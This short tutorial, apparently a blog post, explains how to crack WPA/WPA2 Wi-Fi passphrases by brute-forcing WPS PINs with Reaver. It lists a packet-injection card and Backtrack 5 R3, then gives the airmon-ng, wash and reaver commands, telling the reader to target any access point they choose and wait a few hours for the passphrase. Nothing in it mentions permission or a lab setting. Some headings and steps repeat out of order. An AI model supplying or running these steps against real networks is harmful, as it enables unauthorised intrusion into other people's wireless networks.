Cracking WPA / WPA 2 with Reaver (WPS brute forcing attack tool)
Requirements
bring up Terminal session and type the following
Pick any AP you want and run the following command from the terminal session
wait for 2 to 3 hr before reaver guess the target AP Passphrase.
- Alfa wireless USB network card model AWUS036NHR (must support packet injection)
- Make USB bootable Backtrack 5 R3 OS
bring up Terminal session and type the following
- airmon-ng start wlan1 ( which create new virtual wireless interface called mon0)
- wash -i mon0 ( to find wireless AP that has WPS feature enabled)
Pick any AP you want and run the following command from the terminal session
- reaver -i mon0 -b<bssid of the AP> -c <channel> -a -L -vv
wait for 2 to 3 hr before reaver guess the target AP Passphrase.
Comments